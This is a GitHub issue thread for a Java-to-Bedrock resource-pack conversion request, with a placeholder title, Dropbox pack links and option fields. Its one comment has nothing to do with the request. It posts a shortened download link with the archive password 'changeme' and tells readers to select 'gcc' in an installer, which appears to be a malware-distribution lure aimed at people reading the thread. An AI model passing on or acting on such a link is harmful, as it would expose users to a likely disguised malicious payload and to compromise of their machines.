### ISSUE TITLE
[Pack]: sdgfsdfg

### ISSUE THREAD

**Issue by FunniestCash308** [AZPixel-Team/Java2Bedrock#4580]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/7juhsvad6qyrn6a7nmh7p/generated-237.zip?rlkey=b4w1r7r2gq6eda66lxl7tgsi9&st=boj57hy1&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/d2fmbsd79o6wx774he99c/textures.zip?rlkey=u4cr802a25kjy65wrkv0j79r4&st=z6wmdyqw&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Font Conversion

true

### Armor Conversion

None

### Meg3 Fix

None

### Sounds Conversion

None

### Bow Conversion

None

### Shield Conversion

None

### Block Conversion

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
